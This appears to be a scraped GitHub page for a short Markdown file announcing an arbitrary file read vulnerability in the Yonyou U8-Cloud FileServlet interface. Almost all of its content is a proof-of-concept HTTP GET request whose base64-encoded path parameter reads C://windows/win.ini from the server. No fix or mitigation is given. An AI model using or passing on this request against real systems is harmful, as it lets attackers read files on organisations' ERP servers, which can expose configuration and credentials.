Skip to content

Latest commit

 

History

History
9 lines (6 loc) · 189 Bytes

用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md

File metadata and controls

9 lines (6 loc) · 189 Bytes
Raw

用友U8-Cloud接口FileServlet存在任意文件读取漏洞

poc

GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
Host: url